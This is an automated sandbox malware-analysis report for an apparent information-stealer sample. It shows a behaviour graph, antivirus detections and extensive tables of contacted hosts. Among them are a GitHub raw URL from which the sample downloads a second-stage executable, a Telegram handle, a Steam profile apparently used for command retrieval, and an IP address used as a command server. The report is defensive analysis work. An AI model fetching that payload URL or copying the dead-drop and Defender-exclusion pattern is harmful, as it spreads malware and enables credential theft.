Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc Filesystem12
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579768 Sample: YYjRtxS70h.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 40 t.me 2->40 42 steamcommunity.com 2->42 44 2 other IPs or domains 2->44 56 Multi AV Scanner detection for submitted file 2->56 58 Machine Learning detection for sample 2->58 60 PE file has a writeable .text section 2->60 62 2 other signatures 2->62 8 YYjRtxS70h.exe 15 7 2->8         started        signatures3 process4 dnsIp5 52 github.com 20.233.83.145, 443, 49772 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 8->52 54 raw.githubusercontent.com 185.199.109.133, 443, 49778 FASTLYUS Netherlands 8->54 36 e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, PE32 8->36 dropped 38 C:\Users\user\AppData\...\YYjRtxS70h.exe.log, CSV 8->38 dropped 66 Adds a directory exclusion to Windows Defender 8->66 13 powershell.exe 7 8->13         started        16 powershell.exe 7 8->16         started        18 powershell.exe 7 8->18         started        20 2 other processes 8->20 file6 signatures7 process8 dnsIp9 68 Adds a directory exclusion to Windows Defender 13->68 23 powershell.exe 23 13->23         started        26 conhost.exe 13->26         started        28 powershell.exe 22 16->28         started        30 conhost.exe 16->30         started        32 powershell.exe 23 18->32         started        34 conhost.exe 18->34         started        46 37.27.43.98, 443, 49801, 49880 UNINETAZ Iran (ISLAMIC Republic Of) 20->46 48 t.me 149.154.167.99, 443, 49789, 49869 TELEGRAMRU United Kingdom 20->48 50 steamcommunity.com 104.102.49.254, 443, 49795, 49874 AKAMAI-ASUS United States 20->50 70 Multi AV Scanner detection for dropped file 20->70 72 Machine Learning detection for dropped file 20->72 signatures10 process11 signatures12 64 Loading BitLocker PowerShell Module 32->64

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
YYjRtxS70h.exe62%VirustotalBrowse
YYjRtxS70h.exe66%ReversingLabsByteCode-MSIL.Trojan.Stealerc
YYjRtxS70h.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe100%Joe Sandbox ML
C:\spxzLeEJs\e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe63%ReversingLabsWin32.Trojan.Vigorf
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
steamcommunity.com
104.102.49.254
truefalse
    high
    github.com
    20.233.83.145
    truefalse
      high
      raw.githubusercontent.com
      185.199.109.133
      truefalse
        high
        t.me
        149.154.167.99
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          https://github.com/olosha1/pockket/raw/refs/heads/main/jtkhikadjthsad.exefalse
            high
            https://steamcommunity.com/profiles/76561199804377619false
              high
              https://raw.githubusercontent.com/olosha1/pockket/refs/heads/main/jtkhikadjthsad.exefalse
                high
                https://t.me/m3wm0wfalse
                  high
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=i_iuPUaT8LXN&amp;l=english&ame770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                    high
                    https://player.vimeo.come770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&amp;l=englie770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                        high
                        http://crl.microsoftpowershell.exe, 00000004.00000002.2028077606.0000000007DC2000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://steamcommunity.com/?subsection=broadcastse770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                            high
                            https://37.27.43.98/Re770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://cdn.cloudflare.steamstatice770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                https://community.cloudflare.steamstatic.com/public/css/applications/community/main.e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpfalse
                                  high
                                  https://37.27.43.98/je770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    https://store.steampowered.com/subscriber_agreement/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                      high
                                      https://www.gstatic.cn/recaptcha/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://37.27.43.98/ke770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://telegram.org/img/t_logo_2x.pnge770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmpfalse
                                            high
                                            http://www.valvesoftware.com/legal.htme770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                              high
                                              https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&ae770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                high
                                                https://www.youtube.come770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.come770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2Se770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                      high
                                                      https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe.0.drfalse
                                                        high
                                                        https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2031133778.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2031133778.0000000004E29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2021300435.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004669000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&amp;l=engle770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                            high
                                                            https://steamcommunity.com/profiles/76561199804377619/badgese770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                              high
                                                              https://t.me/owse770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbacke770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 